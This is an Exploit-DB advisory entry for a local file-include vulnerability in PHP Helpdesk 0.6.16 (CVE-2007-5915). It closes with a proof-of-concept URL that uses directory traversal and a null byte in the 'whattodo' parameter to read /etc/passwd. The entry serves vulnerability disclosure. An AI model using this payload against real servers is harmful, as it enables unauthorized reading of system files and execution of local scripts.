PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability

2007-11-03T00:00:00
ID EDB-ID:30735
Type exploitdb
Reporter joseph.giron13
Modified 2007-11-03T00:00:00

Description

PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability. CVE-2007-5915. Webapps exploit for php platform

                                        
                                            source: www.securityfocus.com/bid/26318/info

PHP Helpdesk is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized user to view files and execute local scripts.

PHP Helpdesk 0.6.16 is vulnerable to this issue; other versions may also be affected. 

http://www.example.com/index.php?whattodo=../../../../../../../../../../../etc/passwd%00